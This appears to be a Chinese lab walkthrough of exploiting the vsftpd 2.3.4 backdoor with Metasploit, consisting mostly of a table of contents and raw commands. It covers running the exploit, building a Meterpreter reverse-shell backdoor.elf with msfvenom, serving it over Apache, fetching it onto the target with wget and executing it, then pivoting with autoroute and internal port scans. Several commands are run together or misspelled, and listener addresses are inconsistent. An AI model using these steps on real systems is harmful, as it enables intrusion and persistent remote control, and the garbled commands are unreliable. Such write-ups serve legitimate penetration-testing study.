文章目录
环境
描述
原理
影响版本
漏洞复现
第一部分 漏洞利用
第一步 ,启动metasploit
- 环境
- 描述
- 原理
- 影响版本
- 漏洞复现
- 第一部分 漏洞利用
- 第一步 ,启动metasploit
- 第二步选择漏洞库
- 第三步 设置参数,开始攻击
- 第四步 利用成功,执行命令
- 第二部分 反弹shell远程连接
- 第一步 生成反弹shell
- 第二步 启动本地Apache服务,并将backdoor.elf放置到服务器中
- 第三步 在目标主机上下载shell
- 第四步 在msf终端上执行
- 第五步 在目标机上运行木马文件
- 第六步 查看反弹的Meterpreter终端
- 第三部分 内网信息收集
- 第一步 查看ARP内容
- 第二步 设置跳板,使用autoroute命令来设置跳板
- 第三步 将Meterpreter会话切换到后台
- 第四步 内网主机端口扫描
- 第五步 验证192.168.232.129的80端口开放
- 摘抄
msfconsole
search vsftp
use exploit/unix/ftp/vsftpd_234_backdoor
show options
Set RHOST 192.168.232.202 设置要攻击的机器IP
run
验证 python -c ‘import pty;pty.spawn("/bin/sh")’
whaomi
id
ls
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.232.128 LPORT=4444 -f elf > backdoor.elf
service apache2 start
mv backdoor.elf /var/www/html/
wget http://192.168.232.198/backdoor.elf
msfconsoleuse exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set LHOST 47.94.0.221
set LPORT 4444
exploit
chmod 7777 backdoor.elf./backdoor.elf
run autoroute -prun autoroute -s 192.168.232.0 255.255.255.0
run autoroute -p
background
sessions
use auxiliary/scanner/portscan/tcpshow options
set RHOSTS 192.168.232.129
run
use auxiliary/scanner/http/http_versionshow options
set RHOSTS 192.168.109.159
run
寻找海市蜃楼般的快乐,
然后让荒芜的土地上,开满希望之花。
– 三毛